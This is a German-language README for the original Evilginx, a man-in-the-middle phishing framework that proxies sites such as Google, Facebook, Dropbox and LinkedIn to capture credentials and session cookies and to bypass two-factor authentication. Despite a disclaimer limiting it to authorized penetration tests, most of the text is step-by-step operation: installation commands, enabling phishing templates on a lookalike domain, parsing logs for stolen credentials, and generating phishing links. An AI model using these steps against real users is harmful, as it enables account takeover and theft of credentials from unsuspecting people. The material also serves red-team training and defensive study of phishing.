
BITTE VERWENDEN SIE DIE NEUE VERSION: https://github.com/kgretzky/evilginx2

DIESE VERSION IST VERALTET. BITTE VERWENDEN SIE DIE NEUESTE VERSION!
EVILGINX 2: https://github.com/kgretzky/evilginx2
Evilginx ist ein Man-in-the-Middle-Angriffsframework, das zum Phishing von Anmeldedaten und Sitzungscookies beliebiger Webdienste verwendet wird. Sein Kern läuft auf dem HTTP-Server Nginx, der proxy_pass und sub_filter nutzt, um HTTP-Inhalte zu proxen und zu modifizieren, während der Datenverkehr zwischen Client und Server abgefangen wird.
Sie können auf meinem Blog erfahren, wie es funktioniert und wie Sie alles selbst installieren:
Erster Beitrag mittlerweile etwas veraltet: Evilginx - Advanced Phishing With Two-factor Authentication Bypass
Evilginx 1.0 Update: Evilginx 1.0 Update - Up Your Game in 2FA Phishing
Evilginx 1.1 Update: Evilginx 1.1 Update
Mir ist bewusst, dass Evilginx für sehr bösartige Zwecke verwendet werden kann. Diese Arbeit dient lediglich der Demonstration, was fähige Angreifer tun können. Es liegt in der Verantwortung des Verteidigers, solche Angriffe bei der Einrichtung von Verteidigungsmaßnahmen zu berücksichtigen und Wege zu finden, sich vor dieser Phishing-Methode zu schützen. Evilginx sollte nur in legitimen Penetrationstest-Aufträgen mit schriftlicher Erlaubnis der zu phishenden Parteien eingesetzt werden.
Evilginx stellt ein Installationsskript install.sh zur Verfügung, das die Installation des gesamten Pakets auf jedem Debian wheezy/jessie-Rechner komfortabel und ohne weiteres Zutun übernimmt.
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v1.0
usage: evilginx.py [-h] {setup,parse,genurl} ...
positional arguments:
{setup,parse,genurl}
setup Configure Evilginx.
parse Parse log file(s).
genurl Generate phishing URL.
optional arguments:
-h, --help show this help message and exit
Aktivieren oder deaktivieren Sie Site-Konfigurationen für die Verwendung mit dem Nginx-Server unter Verwendung der mitgelieferten Evilginx-Vorlagen aus dem Verzeichnis sites.
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
(-l | --enable ENABLE | --disable DISABLE)
optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Your phishing domain.
-y Answer all questions with 'Yes'.
-l, --list List available supported apps.
--enable ENABLE Enable following site by name.
--disable DISABLE Disable following site by name.
Verfügbare Site-Konfigurationsvorlagen auflisten:
python evilginx.py setup -l
Listing available supported sites:
- dropbox (/root/evilginx/sites/dropbox/config)
subdomains: www
- google (/root/evilginx/sites/google/config)
subdomains: accounts, ssl
- facebook (/root/evilginx/sites/facebook/config)
subdomains: www, m
- linkedin (/root/evilginx/sites/linkedin/config)
subdomains: www
Google-Phishing-Site mit der vorregistrierten Phishing-Domain not-really-google.com aktivieren:
python evilginx.py setup --enable google -d not-really-google.com
Facebook-Phishing-Site deaktivieren:
python evilginx.py setup --disable facebook
Nginx-Logs parsen, um abgefangene Anmeldedaten und Sitzungscookies zu extrahieren. Logs werden standardmäßig im Verzeichnis logs gespeichert, in dem sich das Skript evilginx.py befindet.
Dies kann automatisch erfolgen, nachdem Sie die automatische Analyse in der Setup-Phase aktiviert haben.
usage: evilginx.py parse [-h] -s SITE [--debug]
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to parse logs for ('all' to parse logs
for all sites).
--debug Does not truncate log file after parsing.
Logs nur für die Google-Site parsen:
python evilginx.py parse -s google
Logs für alle verfügbaren Sites parsen:
python evilginx.py parse -s all
Phishing-URLs generieren, die Sie in Ihren Red-Team-Assessments verwenden können.
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to generate link for.
-r REDIRECT, --redirect REDIRECT
Redirect user to this URL after successful sign-in.
Google-Phishing-URL generieren, die das Opfer nach erfolgreicher Anmeldung auf ein Rick-Roll-Video weiterleitet:
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ
Generated following phishing URLs:
: https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
: https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ